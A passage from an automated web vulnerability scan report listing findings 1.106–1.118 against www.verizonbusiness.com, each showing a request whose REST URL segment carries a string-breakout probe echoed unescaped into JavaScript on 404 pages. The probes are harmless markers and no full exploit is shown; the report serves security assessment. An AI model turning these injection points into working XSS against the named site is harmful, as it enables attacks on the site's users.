//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.106. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46f28'%3b850340af03e was submitted in the REST URL parameter 5. This input was echoed as 46f28';850340af03e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas/security.xml46f28'%3b850340af03e HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43401
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/caas/security.xml46f28';850340af03e'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.107. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65102"%3b0d10cd9898b was submitted in the REST URL parameter 1. This input was echoed as 65102";0d10cd9898b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products65102"%3b0d10cd9898b/it/cloud-it/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Date: Wed, 17 Nov 2010 00:40:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products65102";0d10cd9898b/it/cloud-it/cloud-storage/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.108. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80e28'%3b8a2c735c25c was submitted in the REST URL parameter 1. This input was echoed as 80e28';8a2c735c25c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products80e28'%3b8a2c735c25c/it/cloud-it/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Date: Wed, 17 Nov 2010 00:40:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products80e28';8a2c735c25c/it/cloud-it/cloud-storage/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.109. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74e15'%3bddd3fbc10ba was submitted in the REST URL parameter 2. This input was echoed as 74e15';ddd3fbc10ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it74e15'%3bddd3fbc10ba/cloud-it/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:01 GMT
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it74e15';ddd3fbc10ba/cloud-it/cloud-storage/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.110. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cff"%3b7d3ead31ee8 was submitted in the REST URL parameter 2. This input was echoed as c1cff";7d3ead31ee8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itc1cff"%3b7d3ead31ee8/cloud-it/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42333
Date: Wed, 17 Nov 2010 00:40:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itc1cff";7d3ead31ee8/cloud-it/cloud-storage/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.111. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc65'%3b5791e124a87 was submitted in the REST URL parameter 3. This input was echoed as 7dc65';5791e124a87 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it7dc65'%3b5791e124a87/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it7dc65';5791e124a87/cloud-storage/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.112. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cb77"%3b76d009414d5 was submitted in the REST URL parameter 3. This input was echoed as 8cb77";76d009414d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it8cb77"%3b76d009414d5/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it8cb77";76d009414d5/cloud-storage/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.113. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ca8e"%3b1e2eb5fb679 was submitted in the REST URL parameter 4. This input was echoed as 3ca8e";1e2eb5fb679 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/cloud-storage3ca8e"%3b1e2eb5fb679/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:37 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43403
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/cloud-storage3ca8e";1e2eb5fb679/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.114. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b898e'%3be2aaa764a2 was submitted in the REST URL parameter 4. This input was echoed as b898e';e2aaa764a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/cloud-storageb898e'%3be2aaa764a2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43401
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/cloud-storageb898e';e2aaa764a2/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.115. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3da56'%3b60c3c334ea2 was submitted in the REST URL parameter 1. This input was echoed as 3da56';60c3c334ea2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3da56'%3b60c3c334ea2/it/data-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:03 GMT
Content-Type: text/html
Content-Length: 40646
Date: Wed, 17 Nov 2010 00:40:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products3da56';60c3c334ea2/it/data-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.116. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b813a"%3b4dc7946af8a was submitted in the REST URL parameter 1. This input was echoed as b813a";4dc7946af8a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsb813a"%3b4dc7946af8a/it/data-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:43 GMT
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsb813a";4dc7946af8a/it/data-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.117. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf2b3'%3be822fdb00ab was submitted in the REST URL parameter 2. This input was echoed as cf2b3';e822fdb00ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itcf2b3'%3be822fdb00ab/data-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:36 GMT
Content-Type: text/html
Content-Length: 42313
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/itcf2b3';e822fdb00ab/data-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.118. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba539"%3bf452eb4f7f1 was submitted in the REST URL parameter 2. This input was echoed as ba539";f452eb4f7f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itba539"%3bf452eb4f7f1/data-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:19 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42311
Date: Wed, 17 Nov 2010 00:40:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

